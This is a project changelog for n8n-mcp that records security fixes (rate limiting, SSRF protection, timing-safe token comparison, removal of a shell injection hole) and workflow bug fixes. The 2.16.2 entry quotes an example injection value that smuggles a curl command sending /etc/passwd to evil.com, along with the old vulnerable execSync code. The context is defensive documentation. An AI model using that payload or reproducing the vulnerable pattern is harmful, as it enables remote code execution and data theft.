Files
n8n-mcp/CHANGELOG.md
czlonkowski 06cbb40213 feat: implement security audit fixes - rate limiting and SSRF protection (Issue #265 PR #2)
This commit implements HIGH-02 (Rate Limiting) and HIGH-03 (SSRF Protection)
from the security audit, protecting against brute force attacks and
Server-Side Request Forgery.

Security Enhancements:
- Rate limiting: 20 attempts per 15 minutes per IP (configurable)
- SSRF protection: Three security modes (strict/moderate/permissive)
- DNS rebinding prevention
- Cloud metadata blocking in all modes

🤖 Generated with [Claude Code](https://claude.com/claude-code)

Co-Authored-By: Claude <noreply@anthropic.com>
2025-10-06 15:40:07 +02:00

1201 lines
57 KiB
Markdown
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Changelog
All notable changes to this project will be documented in this file.
The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/),
and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html).
## [2.16.3] - 2025-01-06
### 🔒 Security
**HIGH priority security enhancements. Recommended for all production deployments.**
This release implements 2 high-priority security protections identified in the security audit (Issue #265 PR #2):
- **🛡️ HIGH-02: Rate Limiting for Authentication**
- **Issue:** No rate limiting on authentication endpoints allowed brute force attacks
- **Impact:** Attackers could make unlimited authentication attempts
- **Fix:** Implemented express-rate-limit middleware for authentication endpoint
- Default: 20 attempts per 15 minutes per IP
- Configurable via `AUTH_RATE_LIMIT_WINDOW` and `AUTH_RATE_LIMIT_MAX`
- Per-IP tracking with standard rate limit headers (RateLimit-Limit, RateLimit-Remaining, RateLimit-Reset)
- JSON-RPC formatted error responses (429 Too Many Requests)
- Automatic IP detection behind reverse proxies (requires TRUST_PROXY=1)
- **Verification:** 4 integration tests with sequential request patterns
- **See:** https://github.com/czlonkowski/n8n-mcp/issues/265 (HIGH-02)
- **🛡️ HIGH-03: SSRF Protection for Webhooks**
- **Issue:** Webhook triggers vulnerable to Server-Side Request Forgery attacks
- **Impact:** Attackers could access internal networks, localhost services, and cloud metadata
- **Fix:** Implemented three-mode SSRF protection system with DNS rebinding prevention
- **Strict mode** (default): Block localhost + private IPs + cloud metadata (production)
- **Moderate mode**: Allow localhost, block private IPs + cloud metadata (local development)
- **Permissive mode**: Allow localhost + private IPs, block cloud metadata (internal testing)
- Cloud metadata endpoints **ALWAYS blocked** in all modes (169.254.169.254, metadata.google.internal, etc.)
- DNS rebinding prevention through hostname resolution before validation
- IPv6 support with link-local (fe80::/10) and unique local (fc00::/7) address blocking
- **Configuration:** Set via `WEBHOOK_SECURITY_MODE` environment variable
- **Locations Updated:**
- `src/utils/ssrf-protection.ts` - Core protection logic
- `src/services/n8n-api-client.ts:219` - Webhook trigger validation
- **Verification:** 25 unit tests covering all three modes, DNS rebinding, IPv6
- **See:** https://github.com/czlonkowski/n8n-mcp/issues/265 (HIGH-03)
### Added
- **Configuration:** `AUTH_RATE_LIMIT_WINDOW` - Rate limit window in milliseconds (default: 900000 = 15 minutes)
- **Configuration:** `AUTH_RATE_LIMIT_MAX` - Max authentication attempts per window per IP (default: 20)
- **Configuration:** `WEBHOOK_SECURITY_MODE` - SSRF protection mode (strict/moderate/permissive, default: strict)
- **Documentation:** Comprehensive security features section in all deployment guides
- HTTP_DEPLOYMENT.md - Rate limiting and SSRF protection configuration
- DOCKER_README.md - Security features section with environment variables
- DOCKER_TROUBLESHOOTING.md - "Webhooks to Local n8n Fail" troubleshooting guide
- RAILWAY_DEPLOYMENT.md - Security configuration recommendations
- README.md - Local n8n configuration section for moderate mode
### Changed
- **Security:** All webhook triggers now validate URLs through SSRF protection before execution
- **Security:** HTTP authentication endpoint now enforces rate limiting per IP address
- **Dependencies:** Added `express-rate-limit@^7.1.5` for rate limiting functionality
### Fixed
- **Security:** IPv6 localhost URLs (`http://[::1]/webhook`) now correctly stripped of brackets before validation
- **Security:** Localhost detection now properly handles all localhost variants (127.x.x.x, ::1, localhost, etc.)
## [2.16.2] - 2025-10-06
### 🔒 Security
**CRITICAL security fixes for production deployments. All users should upgrade immediately.**
This release addresses 2 critical security vulnerabilities identified in the security audit (Issue #265):
- **🚨 CRITICAL-02: Timing Attack Vulnerability**
- **Issue:** Non-constant-time string comparison in authentication allowed timing attacks
- **Impact:** Authentication tokens could be discovered character-by-character through statistical timing analysis (estimated 24-48 hours to compromise)
- **Attack Vector:** Repeated authentication attempts with carefully crafted tokens while measuring response times
- **Fix:** Implemented `crypto.timingSafeEqual` for all token comparisons
- **Locations Fixed:**
- `src/utils/auth.ts:27` - validateToken method
- `src/http-server-single-session.ts:1087` - Single-session HTTP auth
- `src/http-server.ts:315` - Fixed HTTP server auth
- **New Method:** `AuthManager.timingSafeCompare()` - constant-time token comparison utility
- **Verification:** 11 unit tests with timing variance analysis (<10% variance proven)
- **CVSS:** 8.5 (High) - Confirmed critical, requires authentication but trivially exploitable
- **See:** https://github.com/czlonkowski/n8n-mcp/issues/265 (CRITICAL-02)
- **🚨 CRITICAL-01: Command Injection Vulnerability**
- **Issue:** User-controlled `nodeType` parameter injected into shell commands via `execSync`
- **Impact:** Remote code execution, data exfiltration, network scanning possible
- **Attack Vector:** Malicious nodeType like `test"; curl http://evil.com/$(cat /etc/passwd | base64) #`
- **Vulnerable Code (FIXED):** `src/utils/enhanced-documentation-fetcher.ts:567-590`
- **Fix:** Eliminated all shell execution, replaced with Node.js fs APIs
- Replaced `execSync()` with `fs.readdir()` (recursive, no shell)
- Added multi-layer input sanitization: `/[^a-zA-Z0-9._-]/g`
- Added directory traversal protection (blocks `..`, `/`, relative paths)
- Added `path.basename()` for additional safety
- Added final path verification (ensures result within expected directory)
- **Benefits:**
- 100% immune to command injection (no shell execution)
- Cross-platform compatible (no dependency on `find`/`grep`)
- Faster (no process spawning overhead)
- Better error handling and logging
- **Verification:** 9 integration tests covering all attack vectors
- **CVSS:** 8.8 (High) - Requires MCP access but trivially exploitable
- **See:** https://github.com/czlonkowski/n8n-mcp/issues/265 (CRITICAL-01)
### Added
- **Security Test Suite**
- Unit Tests: `tests/unit/utils/auth-timing-safe.test.ts` (11 tests)
- Timing variance analysis (proves <10% variance = constant-time)
- Edge cases: null, undefined, empty, very long tokens (10000 chars)
- Special characters, Unicode, whitespace handling
- Case sensitivity verification
- Integration Tests: `tests/integration/security/command-injection-prevention.test.ts` (9 tests)
- Command injection with all vectors (semicolon, &&, |, backticks, $(), newlines)
- Directory traversal prevention (parent dir, URL-encoded, absolute paths)
- Special character sanitization
- Null byte handling
- Legitimate operations (ensures fix doesn't break functionality)
### Changed
- **Authentication:** All token comparisons now use timing-safe algorithm
- **Documentation Fetcher:** Now uses Node.js fs APIs instead of shell commands
- **Security Posture:** Production-ready with hardened authentication and input validation
### Technical Details
**Timing-Safe Comparison Implementation:**
```typescript
// NEW: Constant-time comparison utility
static timingSafeCompare(plainToken: string, expectedToken: string): boolean {
try {
if (!plainToken || !expectedToken) return false;
const plainBuffer = Buffer.from(plainToken, 'utf8');
const expectedBuffer = Buffer.from(expectedToken, 'utf8');
if (plainBuffer.length !== expectedBuffer.length) return false;
// Uses crypto.timingSafeEqual for constant-time comparison
return crypto.timingSafeEqual(plainBuffer, expectedBuffer);
} catch {
return false;
}
}
// USAGE: Replace token !== this.authToken with:
const isValidToken = this.authToken &&
AuthManager.timingSafeCompare(token, this.authToken);
```
**Command Injection Fix:**
```typescript
// BEFORE (VULNERABLE):
execSync(`find ${this.docsPath}/docs/integrations/builtin -name "${nodeType}.md"...`)
// AFTER (SECURE):
const sanitized = nodeType.replace(/[^a-zA-Z0-9._-]/g, '');
if (sanitized.includes('..') || sanitized.startsWith('.') || sanitized.startsWith('/')) {
logger.warn('Path traversal attempt blocked', { nodeType, sanitized });
return null;
}
const safeName = path.basename(sanitized);
const files = await fs.readdir(searchPath, { recursive: true });
const match = files.find(f => f.endsWith(`${safeName}.md`) && !f.includes('credentials'));
```
### Breaking Changes
**None** - All changes are backward compatible. No API changes, no environment variable changes, no database migrations.
### Migration Guide
**No action required** - This is a drop-in security fix. Simply upgrade:
```bash
npm install n8n-mcp@2.16.2
# or
npm update n8n-mcp
```
### Deployment Notes
**Recommended Actions:**
1. **Upgrade immediately** - These are critical security fixes
2. **Review logs** - Check for any suspicious authentication attempts or unusual nodeType parameters
3. **Rotate tokens** - Consider rotating AUTH_TOKEN after upgrade (optional but recommended)
**No configuration changes needed** - The fixes are transparent to existing deployments.
### Test Results
**All Tests Passing:**
- Unit tests: 11/11 (timing-safe comparison)
- Integration tests: 9/9 (command injection prevention)
- Timing variance: <10% (proves constant-time)
- All existing tests: (no regressions)
**Security Verification:**
- No command execution with malicious inputs
- Timing attack variance <10% (statistical analysis over 1000 samples)
- Directory traversal blocked (parent dir, absolute paths, URL-encoded)
- All special characters sanitized safely
### Audit Trail
**Security Audit:** Issue #265 - Third-party security audit identified 25 issues
**This Release:** Fixes 2 CRITICAL issues (CRITICAL-01, CRITICAL-02)
**Remaining Work:** 20 issues to be addressed in subsequent releases (HIGH, MEDIUM, LOW priority)
### References
- Security Audit: https://github.com/czlonkowski/n8n-mcp/issues/265
- Implementation Plan: `docs/local/security-implementation-plan-issue-265.md`
- Audit Analysis: `docs/local/security-audit-analysis-issue-265.md`
---
## [2.16.1] - 2025-10-06
### Fixed
- **🐛 Issue #277: Missing Signal Handlers in stdio Mode**
- **Problem**: Node.js processes remained orphaned when Claude Desktop quit
- **Platform**: Primarily affects Windows 11, but improves reliability on all platforms
- **Root Cause**: stdio mode never registered SIGTERM/SIGINT signal handlers
- **Impact**: Users had to manually kill processes via Task Manager after quitting Claude Desktop
- **Fix**: Added comprehensive graceful shutdown handlers for stdio mode
- SIGTERM, SIGINT, and SIGHUP signal handlers
- stdin end/close event handlers (PRIMARY shutdown mechanism for Claude Desktop)
- Robust container detection: Checks IS_DOCKER/IS_CONTAINER env vars + filesystem markers
- Supports Docker, Kubernetes, Podman, and other container runtimes
- Container mode: Signal handlers only (prevents detached mode premature shutdown)
- Claude Desktop mode: stdin + signal handlers (comprehensive coverage)
- Race condition protection with `isShuttingDown` guard
- stdin cleanup with null safety (pause + destroy)
- Graceful shutdown timeout (1000ms) to allow cleanup to complete
- Error handling with try-catch for stdin registration and shutdown
- Shutdown trigger logging for debugging (SIGTERM vs stdin close)
- Production-hardened based on comprehensive code review
- **Location**: `src/mcp/index.ts:91-132`
- **Resources Cleaned**: Cache timers and database connections properly closed via existing `shutdown()` method
- **Code Review**: Approved with recommendations implemented
- **Reporter**: @Eddy-Chahed
## [2.16.0] - 2025-10-06
### Added
- **🎉 Issue #272 Phase 1: Connection Operations UX Improvements**
**New: `rewireConnection` Operation**
- Intuitive operation for changing connection target from one node to another
- Syntax: `{type: "rewireConnection", source: "Node", from: "OldTarget", to: "NewTarget"}`
- Internally uses remove + add pattern but with clearer semantics
- Supports smart parameters (branch, case) for multi-output nodes
- Validates all nodes exist before making changes
- 8 comprehensive unit tests covering all scenarios
**New: Smart Parameters for Multi-Output Nodes**
- **branch parameter for IF nodes**: Use `branch: "true"` or `branch: "false"` instead of `sourceIndex: 0/1`
- **case parameter for Switch nodes**: Use `case: 0`, `case: 1`, etc. instead of `sourceIndex`
- Semantic, intuitive syntax that matches node behavior
- Explicit sourceIndex overrides smart parameters if both provided
- Works with both `addConnection` and `rewireConnection` operations
- 8 comprehensive unit tests + 11 integration tests against real n8n API
### Changed
- **⚠ BREAKING: Removed `updateConnection` operation**
- Operation removed completely (type definition, implementation, validation, tests)
- Migration: Use `rewireConnection` or `removeConnection` + `addConnection` instead
- Reason: Confusing operation that was error-prone and rarely needed
- All tests updated (137 tests passing)
### Fixed
- **🐛 CRITICAL: Issue #275, #136 - TypeError in getNodeTypeAlternatives (57.4% of production errors)**
- **Impact**: Eliminated 323 out of 563 production errors, helping 127 users (76.5% of affected users)
- **Resolves Issue #136**: "Partial Workflow Updates fail with 'Cannot convert undefined or null to object'" - defensive type guards prevent these crashes
- **Root Cause**: `getNodeTypeAlternatives()` called string methods without validating nodeType parameter
- **Fix**: Added defense-in-depth protection:
- **Layer 1**: Type guard in `getNodeTypeAlternatives()` returns empty array for invalid inputs
- **Layer 2**: Enhanced `validateToolParamsBasic()` to catch empty strings
- **Affected Tools**: `get_node_essentials` (208 errors 0), `get_node_info` (115 errors 0), `get_node_documentation` (17 errors 0)
- **Testing**: 21 comprehensive unit tests, verified with n8n-mcp-tester agent
- **Commit**: f139d38
- **Critical Bug: Smart Parameter Implementation**
- **Bug #1**: `branch` parameter initially mapped to `sourceOutput` instead of `sourceIndex`
- **Impact**: IF node connections went to wrong output (expected `IF.main[0]`, got `IF.true`)
- **Root Cause**: Misunderstood n8n's IF node connection structure
- **Fix**: Changed to correctly map `branch="true"` `sourceIndex=0`, `branch="false"` `sourceIndex=1`
- **Discovered by**: n8n-mcp-tester agent testing against real n8n API
- **Commit**: a7bfa73
- **Critical Bug: Zod Schema Stripping Parameters**
- **Bug #2**: `branch`, `case`, `from`, `to` parameters stripped by Zod validation
- **Impact**: Parameters never reached diff engine, smart parameters silently failed
- **Root Cause**: Parameters not defined in Zod schema in handlers-workflow-diff.ts
- **Fix**: Added missing parameters to schema
- **Discovered by**: n8n-mcp-tester agent
- **Commit**: aeaba3b
- **🔥 CRITICAL Bug: Array Index Corruption in Multi-Output Nodes**
- **Bug #3**: `applyRemoveConnection()` filtered empty arrays, causing index shifting in multi-output nodes
- **Impact**: PRODUCTION-BREAKING for Switch, IF with multiple handlers, Merge nodes
- **Severity**: Connections routed to wrong outputs after rewiring
- **Example**: Switch with 4 outputs `[[H0], [H1], [H2], [H3]]` remove H1 `[[H0], [H2], [H3]]` (indices shifted!)
- **Root Cause**: Line 697 filtered empty arrays: `connections.filter(conns => conns.length > 0)`
- **Fix**: Only remove trailing empty arrays, preserve intermediate ones to maintain index integrity
- **Code Change**:
```typescript
// Before (BUGGY):
workflow.connections[node][output] = connections.filter(conns => conns.length > 0);
// After (FIXED):
while (connections.length > 0 && connections[connections.length - 1].length === 0) {
connections.pop();
}
```
- **Testing**: Added integration test verifying Switch node rewiring preserves all indices
- **Discovered by**: n8n-mcp-tester agent during comprehensive testing
- **Commit**: aeb7410
- **TypeScript Compilation**: Added missing type annotations in workflow diff tests (Commit: 653f395)
### Improved
- **Integration Testing**: Created comprehensive integration tests against real n8n API
- 11 tests covering IF nodes, Switch nodes, and rewireConnection
- Tests validate actual n8n workflow structure, not in-memory objects
- Would have caught both smart parameter bugs that unit tests missed
- File: `tests/integration/n8n-api/workflows/smart-parameters.test.ts`
- **Commit**: 34bafe2
- **Documentation**: Updated MCP tool documentation
- Removed `updateConnection` references
- Added `rewireConnection` with 4 examples
- Added smart parameters section with IF and Switch examples
- Updated best practices and pitfalls
- Removed version references (AI agents see current state)
- Files: `src/mcp/tool-docs/workflow_management/n8n-update-partial-workflow.ts`, `docs/workflow-diff-examples.md`
- **Commit**: f78f53e
### Test Coverage
- **Total Tests**: 178 tests passing (158 unit + 20 integration against real n8n API)
- **Coverage**: 90.98% statements, 89.86% branches, 93.02% functions
- **Quality**: Integration tests against real n8n API prevent regression
- **New Tests**:
- 21 tests for TypeError prevention (Issue #275)
- 8 tests for rewireConnection operation
- 8 tests for smart parameters
- 20 integration tests against real n8n API:
- **Multi-output nodes (sourceIndex preservation)**:
- Switch node rewiring with index preservation
- IF node empty array preservation on removal
- Switch node removing first case (production-breaking bug scenario)
- Sequential operations on Switch node
- Filter node connection rewiring
- **Multi-input nodes (targetIndex preservation)**:
- Merge node removing connection to input 0
- Merge node removing middle connection (inputs 0, 2 preserved)
- Merge node replacing source connections
- Merge node sequential operations
### Technical Details
**TypeError Prevention (Issue #275):**
```typescript
// Layer 1: Defensive utility function
export function getNodeTypeAlternatives(nodeType: string): string[] {
// Return empty array for invalid inputs instead of crashing
if (!nodeType || typeof nodeType !== 'string' || nodeType.trim() === '') {
return [];
}
// ... rest of function
}
// Layer 2: Enhanced validation
if (param === '') {
errors.push(`String parameters cannot be empty. Parameter '${key}' has value: ""`);
}
```
**Smart Parameters Resolution:**
```typescript
// Resolve branch parameter for IF nodes
if (operation.branch !== undefined && operation.sourceIndex === undefined) {
if (sourceNode?.type === 'n8n-nodes-base.if') {
sourceIndex = operation.branch === 'true' ? 0 : 1;
// sourceOutput remains 'main'
}
}
// Resolve case parameter for Switch nodes
if (operation.case !== undefined && operation.sourceIndex === undefined) {
sourceIndex = operation.case;
}
```
**Real n8n IF Node Structure:**
```json
"IF": {
"main": [
[/* true branch connections, index 0 */],
[/* false branch connections, index 1 */]
]
}
```
### Migration Guide
**Before (v2.15.7):**
```typescript
// Old way: updateConnection (REMOVED)
{type: "updateConnection", source: "Webhook", target: "Handler", updates: {...}}
// Old way: Multi-output nodes (still works)
{type: "addConnection", source: "IF", target: "Success", sourceIndex: 0}
```
**After (v2.16.0):**
```typescript
// New way: rewireConnection
{type: "rewireConnection", source: "Webhook", from: "OldHandler", to: "NewHandler"}
// New way: Smart parameters (recommended)
{type: "addConnection", source: "IF", target: "Success", branch: "true"}
{type: "addConnection", source: "IF", target: "Error", branch: "false"}
{type: "addConnection", source: "Switch", target: "Handler", case: 0}
```
### Impact Summary
**Production Error Reduction:**
- Issue #275 fix: -323 errors (-57.4% of total production errors)
- Helps 127 users (76.5% of users experiencing errors)
**UX Improvements:**
- Semantic parameters make multi-output node connections intuitive
- `rewireConnection` provides clear intent for connection changes
- Integration tests ensure production reliability
**Breaking Changes:**
- `updateConnection` removed (use `rewireConnection` or manual remove+add)
### References
- **Issue #272**: Connection operations improvements (Phase 0 + Phase 1)
- **Issue #204**: Differential update failures on Windows
- **Issue #275**: TypeError in getNodeTypeAlternatives
- **Issue #136**: Partial Workflow Updates fail with "Cannot convert undefined or null to object" (resolved by defensive type guards)
- **Commits**:
- Phase 0: cfe3c5e, 653f395, 2a85000
- Phase 1: f9194ee, ee125c5, a7bfa73, aeaba3b, 34bafe2, c6e0e52, f78f53e
- Issue #275/#136: f139d38
## [2.15.7] - 2025-10-05
### Fixed
- **🐛 CRITICAL: Issue #272, #204 - Connection Operations Phase 0 Fixes**
**Bug #1: Multi-Output Node Routing Broken**
- **Problem**: `addConnection` ignored `sourceIndex` parameter due to `||` operator treating `0` as falsy
- **Impact**: IF nodes, Switch nodes, and all conditional routing completely broken
- **Root Cause**: Used `operation.sourceIndex || 0` instead of `operation.sourceIndex ?? 0`
- **Fix**: Changed to nullish coalescing (`??`) operator to properly handle explicit `0` values
- **Added**: Defensive array validation before index access
- **Result**: Multi-output nodes now work reliably (rating improved 3/10 → 9/10)
- **Test Coverage**: 6 comprehensive tests covering IF nodes, Switch nodes, and parallel execution
**Bug #2: Server Crashes from Missing `updates` Object**
- **Problem**: `updateConnection` without `updates` object caused server crash with "Cannot read properties of undefined"
- **Impact**: Malformed requests from AI agents crashed the MCP server
- **Fix**: Added runtime validation with comprehensive error message
- **Error Message Quality**:
- Shows what was provided (JSON.stringify of operation)
- Explains what's wrong and why
- Provides correct format with example
- Suggests alternative approach (removeConnection + addConnection)
- **Result**: No crashes, self-service troubleshooting enabled (rating improved 2/10 → 8/10)
- **Test Coverage**: 2 tests for missing and invalid `updates` object
### Improved
- **Connection Operations Overall Experience**: 4.5/10 → 8.5/10 (+89% improvement)
- **Error Handling**: Helpful, actionable error messages instead of cryptic crashes
- **Documentation**: Updated tool docs with Phase 0 fix notes and new pitfall warnings
- **Developer Experience**: Better use of nullish coalescing, defensive programming patterns
### Test Coverage
- Total Tests: 126/126 passing (100%)
- New Tests: 8 comprehensive tests for Phase 0 fixes
- Coverage: 91.16% statements, 88.14% branches, 92.85% functions
- Test Quality: All edge cases covered, strong assertions, independent test isolation
### Technical Details
**Multi-Output Node Fix:**
```typescript
// Before (BROKEN):
const sourceIndex = operation.sourceIndex || 0; // 0 treated as falsy!
// After (FIXED):
const sourceIndex = operation.sourceIndex ?? 0; // explicit 0 preserved
```
**Runtime Validation Fix:**
```typescript
// Added comprehensive validation:
if (!operation.updates || typeof operation.updates !== 'object') {
throw new Error(/* helpful 15-line error message */);
}
```
### References
- Issue #272: Connection operations failing (Polish language issue report)
- Issue #204: Differential update failures on Windows
- Analysis Document: `docs/local/connection-operations-deep-dive-and-improvement-plan.md` (2176 lines)
- Testing: Hands-on validation with n8n-mcp-tester agent
- Code Review: Comprehensive review against improvement plan
### Phase 1 Roadmap
Phase 0 addressed critical bugs. Future Phase 1 improvements planned:
- Add `rewireConnection` operation for intuitive connection rewiring
- Add smart parameters (`branch` for IF nodes, `case` for Switch nodes)
- Enhanced error messages with spell-checking
- Deprecation path for `updateConnection`
## [2.15.6] - 2025-10-05
### Fixed
- **Issue #269: Missing addNode Examples** - Added comprehensive examples for addNode operation in MCP tool documentation
- Problem: Claude AI didn't know how to use addNode operation correctly due to zero examples in documentation
- Solution: Added 4 progressive examples to `n8n_update_partial_workflow` tool documentation:
1. Basic addNode (minimal configuration)
2. Complete addNode (full parameters including typeVersion)
3. addNode + addConnection combo (most common pattern)
4. Batch operation (multiple nodes + connections)
- Impact: AI assistants can now correctly use addNode without errors or trial-and-error
- **Issue #270: Apostrophes in Node Names** - Fixed workflow diff operations failing when node names contain special characters
- Root Cause: `findNode()` method used exact string matching without normalization, causing escaped vs unescaped character mismatches
- Example: Default Manual Trigger node name "When clicking 'Execute workflow'" failed when JSON-RPC sent escaped version "When clicking \\'Execute workflow\\'"
- Solution: Added `normalizeNodeName()` helper that unescapes special characters (quotes, backslashes) and normalizes whitespace
- Affected Operations: 8 operations fixed - addConnection, removeConnection, updateConnection, removeNode, updateNode, moveNode, enableNode, disableNode
- Error Messages: Enhanced all validation methods with `formatNodeNotFoundError()` helper showing available nodes and suggesting node IDs for special characters
- Duplicate Prevention: Fixed `validateAddNode()` to use normalization when checking for duplicate node names
### Changed
- **WorkflowDiffEngine String Normalization** - Enhanced to handle edge cases from code review
- Regex Processing Order: Fixed critical bug - now processes backslashes BEFORE quotes (prevents multiply-escaped character failures)
- Whitespace Handling: Comprehensive normalization of tabs, newlines, and mixed whitespace (prevents collision edge cases)
- Documentation: Added detailed JSDoc warnings about normalization collision risks with examples
- Best Practice: Documentation recommends using node IDs over names for special characters
### Technical Details
- **Normalization Algorithm**: 4-step process
1. Trim leading/trailing whitespace
2. Unescape backslashes (MUST be first!)
3. Unescape single and double quotes
4. Normalize all whitespace to single spaces
- **Error Message Format**: Now shows node IDs (first 8 chars) and suggests using IDs for special characters
- **Collision Prevention**: Duplicate checking uses same normalization to prevent subtle bugs
### Test Coverage
- Unit tests: 120/120 passing (up from 116)
- New test scenarios:
- Tabs in node names
- Newlines in node names
- Mixed whitespace (tabs + newlines + spaces)
- Escaped vs unescaped matching (core Issue #270 scenario)
- Coverage: 90.11% statements (up from 90.05%)
### Code Review
- All 6 MUST FIX and SHOULD FIX recommendations implemented:
- ✅ Fixed regex processing order (critical bug)
- ✅ Added comprehensive whitespace tests
- ✅ Fixed duplicate checking normalization
- ✅ Enhanced all 6 validation method error messages
- ✅ Added comprehensive JSDoc documentation
- ✅ Added escaped vs unescaped test case
- Final review: APPROVED FOR MERGE (production-ready)
### Impact
- **Workflow Operations**: All 8 affected operations now handle special characters correctly
- **User Experience**: Clear error messages with actionable suggestions
- **Reliability**: Comprehensive normalization prevents subtle bugs
- **Documentation**: Tool documentation updated to reflect fix (v2.15.6+)
## [2.15.5] - 2025-10-04
### Added
- **Phase 5 Integration Tests** - Comprehensive workflow management tests (16 scenarios)
- `delete-workflow.test.ts`: 3 test scenarios
- Successful deletion
- Error handling for non-existent workflows
- Cleanup verification (workflow actually deleted from n8n)
- `list-workflows.test.ts`: 13 test scenarios
- No filters (all workflows)
- Filter by active status (true/false)
- Pagination (first page, cursor, last page)
- Limit variations (1, 50, 100)
- Exclude pinned data
- Empty results handling
- Sort order consistency verification
### Fixed
- **handleDeleteWorkflow** - Now returns deleted workflow data in response
- Before: Returned only success message
- After: Returns deleted workflow object per n8n API specification
- Impact: MCP tool consumers can access deleted workflow data for confirmation, logging, or undo operations
- **handleListWorkflows Tags Filter** - Fixed tags parameter format for n8n API compliance
- Before: Sent tags as array `?tags[]=tag1&tags[]=tag2` (non-functional)
- After: Converts to comma-separated string `?tags=tag1,tag2` per n8n OpenAPI spec
- Impact: Tags filtering now works correctly when listing workflows
- Implementation: `input.tags.join(',')` conversion in handler
- **N8nApiClient.deleteWorkflow** - Return type now matches n8n API specification
- Before: `Promise<void>`
- After: `Promise<Workflow>` (returns deleted workflow object)
- Impact: Aligns with n8n API behavior where DELETE returns the deleted resource
### Changed
- **WorkflowListParams.tags** - Type changed for API compliance
- Before: `tags?: string[] | null` (incorrect)
- After: `tags?: string | null` (comma-separated string per n8n OpenAPI spec)
- Impact: Type safety now matches actual API behavior
### Technical Details
- **API Compliance**: All fixes align with n8n OpenAPI specification
- **Backward Compatibility**: Handler maintains existing MCP tool interface (array input converted internally)
- **Type Safety**: TypeScript types now accurately reflect n8n API contracts
### Test Coverage
- Integration tests: 71/71 passing (Phase 1-5 complete)
- Total test scenarios across all phases: 87
- New coverage:
- Workflow deletion: 3 scenarios
- Workflow listing with filters: 13 scenarios
### Impact
- **DELETE workflows**: Now returns workflow data for verification
- **List with tags**: Tag filtering now functional (was broken before)
- **API alignment**: Implementation correctly matches n8n OpenAPI specification
- **Test reliability**: All integration tests passing in CI
## [2.15.4] - 2025-10-04
### Fixed
- **Workflow Settings Updates** - Enhanced `cleanWorkflowForUpdate` to enable settings updates while maintaining Issue #248 protection
- Changed from always overwriting settings with `{}` to filtering to whitelisted properties
- Filters settings to OpenAPI spec whitelisted properties: `saveExecutionProgress`, `saveManualExecutions`, `saveDataErrorExecution`, `saveDataSuccessExecution`, `executionTimeout`, `errorWorkflow`, `timezone`, `executionOrder`
- Removes unsafe properties like `callerPolicy` that cause "additional properties" API errors
- Maintains backward compatibility: empty object `{}` still used when no settings provided
- Resolves conflict between preventing Issue #248 errors and enabling legitimate settings updates
- **Phase 4 Integration Tests** - Fixed workflow update tests to comply with n8n API requirements
- Updated all `handleUpdateWorkflow` tests to include required fields: `name`, `nodes`, `connections`, `settings`
- Tests now fetch current workflow state before updates to obtain required fields
- Removed invalid "Update Connections" test that attempted to set empty connections on multi-node workflow (architecturally invalid)
- All 42 workflow update test scenarios now passing
### Changed
- **Settings Filtering Strategy** - Updated `cleanWorkflowForUpdate()` implementation
- Before: Always set `settings = {}` (prevented all settings updates)
- After: Filter to whitelisted properties (allows valid updates, blocks problematic ones)
- Impact: Users can now update workflow settings via API while staying protected from validation errors
### Technical Details
- **Whitelist-based Filtering**: Implements principle of least privilege for settings properties
- **Reference**: Properties validated against n8n OpenAPI specification `workflowSettings` schema
- **Security**: More secure than blacklist approach (fails safe, unknown properties filtered)
- **Performance**: Filtering adds <1ms overhead per workflow update
### Test Coverage
- Unit tests: 72/72 passing (100% coverage for n8n-validation)
- Integration tests: 433/433 passing (Phase 4 complete)
- Test scenarios:
- Settings filtering with safe/unsafe property combinations
- Empty settings handling
- Backward compatibility verification
- Multi-node workflow connection validation
### Impact
- **Settings Updates**: Users can now update workflow settings (timezone, executionOrder, etc.) via API
- **Issue #248 Protection Maintained**: `callerPolicy` and other problematic properties still filtered
- **Test Reliability**: All Phase 4 integration tests passing in CI
- **API Compliance**: Tests correctly implement n8n API requirements for workflow updates
## [2.15.3] - 2025-10-03
### Added
- **Error Message Capture in Telemetry** - Enhanced telemetry tracking to capture actual error messages for better debugging
- Added optional `errorMessage` parameter to `trackError()` method
- Comprehensive error message sanitization to protect sensitive data
- Updated all production and test call sites to pass error messages
- Error messages now stored in telemetry events table for analysis
### Security
- **Enhanced Error Message Sanitization** - Comprehensive security hardening for telemetry data
- **ReDoS Prevention**: Early truncation to 1500 chars before regex processing
- **Full URL Redaction**: Changed from `[URL]/path` to `[URL]` to prevent API structure leakage
- **Correct Sanitization Order**: URLs → specific credentials → emails → generic patterns
- **Credential Pattern Detection**: Added AWS keys, GitHub tokens, JWT, Bearer tokens
- **Error Handling**: Try-catch wrapper with `[SANITIZATION_FAILED]` fallback
- **Stack Trace Truncation**: Limited to first 3 lines to reduce attack surface
### Fixed
- **Missing Error Messages**: Resolved issue where 272+ weekly validation errors had no error messages captured
- **Data Leakage**: Fixed URL path preservation exposing API versions and user IDs
- **Email Exposure**: Fixed sanitization order allowing emails in URLs to leak
- **ReDoS Vulnerability**: Removed complex capturing regex patterns that could cause performance issues
### Changed
- **Breaking Change**: `trackError()` signature updated with 4th parameter `errorMessage?: string`
- All internal call sites updated in single commit (atomic change)
- Not backwards compatible but acceptable as all code is internal
### Technical Details
- **Sanitization Patterns**:
- AWS Keys: `AKIA[A-Z0-9]{16}` → `[AWS_KEY]`
- GitHub Tokens: `ghp_[a-zA-Z0-9]{36,}` → `[GITHUB_TOKEN]`
- JWT: `eyJ[a-zA-Z0-9_-]+\.eyJ[a-zA-Z0-9_-]+\.[a-zA-Z0-9_-]+` → `[JWT]`
- Bearer Tokens: `Bearer [^\s]+` → `Bearer [TOKEN]`
- Emails: `[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}` → `[EMAIL]`
- Long Keys: `\b[a-zA-Z0-9_-]{32,}\b` → `[KEY]`
- Generic Credentials: `password/api_key/token=<value>` → `<field>=[REDACTED]`
### Test Coverage
- Added 18 new security-focused tests
- Total telemetry tests: 269 passing
- Coverage: 90.75% for telemetry module
- All security patterns validated with edge cases
### Performance
- Early truncation prevents ReDoS attacks
- Simplified regex patterns (no complex capturing groups)
- Sanitization adds <1ms overhead per error
- Final message truncated to 500 chars max
### Impact
- **Debugging**: Error messages now available for root cause analysis
- **Security**: Comprehensive protection against credential leakage
- **Performance**: Protected against ReDoS attacks
